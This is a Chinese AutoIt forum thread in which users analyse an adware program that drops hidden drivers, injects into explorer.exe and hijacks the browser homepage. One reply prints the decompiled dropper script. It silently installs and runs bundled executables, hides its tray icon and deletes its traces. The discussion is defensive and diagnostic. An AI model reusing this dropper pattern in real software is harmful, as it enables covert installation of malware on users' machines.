释放驱动，注入explorer.exe~~求助!![已解决]

woeiwoei · 发表于 2010-11-24 15:41:21

本帖最后由 woeiwoei 于 2010-11-25 09:20 编辑

朋友传来一个程序。运行后会在c:\windows\system32下建立当天日期为准的文件夹。并且释放两个驱动文件到这个文件夹内。并隐藏。
分析发现是远程线程注入的方式注入到 explorer.exe 而且还加载广告文件。路径为：c:\windows\desk.exe
目的是强制修改主页，加载广告。。解决方法是，替换 explorer.exe 或拒绝释放驱动文件。。
本人无能，根据网上方法。没能用OD 得到源码。。。版本为3.3.1.6。壳已脱，希望遇到高手能反一下。。

源程序：

king8462 · 发表于 2010-11-24 15:45:54

au3这么强啊！希望高手能给出答案

woeiwoei · 发表于 2010-11-24 15:51:09

au3这么强啊！希望高手能给出答案
king8462 发表于 2010-11-24 15:45

是啊。。高手太多。。

pusofalse · 发表于 2010-11-24 20:52:55

截取任意一步就可以阻止了。
1、挂钩CreateDirectory阻止新建文件夹。
2、挂钩NtCreateFile阻止释放驱动。
3、挂钩NtCreateThread阻止创建远程线程。

快雪时晴 · 发表于 2010-11-24 22:08:40

关键不在这个au3程序，在于附着的木马程序

#Region AutoIt3Wrapper 预编译参数(常用参数)
#AutoIt3Wrapper_Icon=IE.ICO
#AutoIt3Wrapper_Outfile=IEFZ.DLL
#AutoIt3Wrapper_Outfile_Type=DLL
#AutoIt3Wrapper_Compression=9
#AutoIt3Wrapper_UseUpx=y
#AutoIt3Wrapper_Res_Comment=客户端辅助
#AutoIt3Wrapper_Res_Description=客户端辅助
#AutoIt3Wrapper_Res_Fileversion=1.0.0.1
#AutoIt3Wrapper_Res_LegalCopyright=备份管理系统
#AutoIt3Wrapper_Change2CUI=N
#EndRegion AutoIt3Wrapper 预编译参数(常用参数)
AutoItSetOption('TrayIconHide', 1)
FileDelete(@WindowsDir & '\Desk.exe')
FileDelete(@WindowsDir & '\linkconfig.ini')
FileDelete(@WindowsDir & '\9380_1.exe')
FileInstall('C:\9380_1.exe', @WindowsDir & '\9380_1.exe', 1)
FileInstall('C:\Desk.exe', @WindowsDir & '\Desk.exe', 1)
FileInstall('C:\linkconfig.ini', @WindowsDir & '\linkconfig.ini', 1)
Run(@WindowsDir & '\9380_1.exe', @WindowsDir, @SW_HIDE)
Sleep(12000)
Run(@WindowsDir & '\Desk.exe', @WindowsDir, @SW_HIDE)
FileDelete(@WindowsDir & '\9380_1.exe')
Exit

woeiwoei · 发表于 2010-11-25 09:18:41

关键不在这个au3程序，在于附着的木马程序
快雪时晴发表于 2010-11-24 22:08

原因找到了。。释放的9380_1.exe为E语言编写，是关键的主程序，可惜E反不了。
是我搞错对象了。
呵呵。谢谢你，也谢谢P大的指点。。此帖结了~~~

浪迹红客 · 发表于 2011-5-31 19:01:50

原来、、、、

		自动登录	找回密码
密码			加入

[AU3基础] 释放驱动，注入explorer.exe~~求助!![已解决]

本帖子中包含更多资源

评分

相关帖子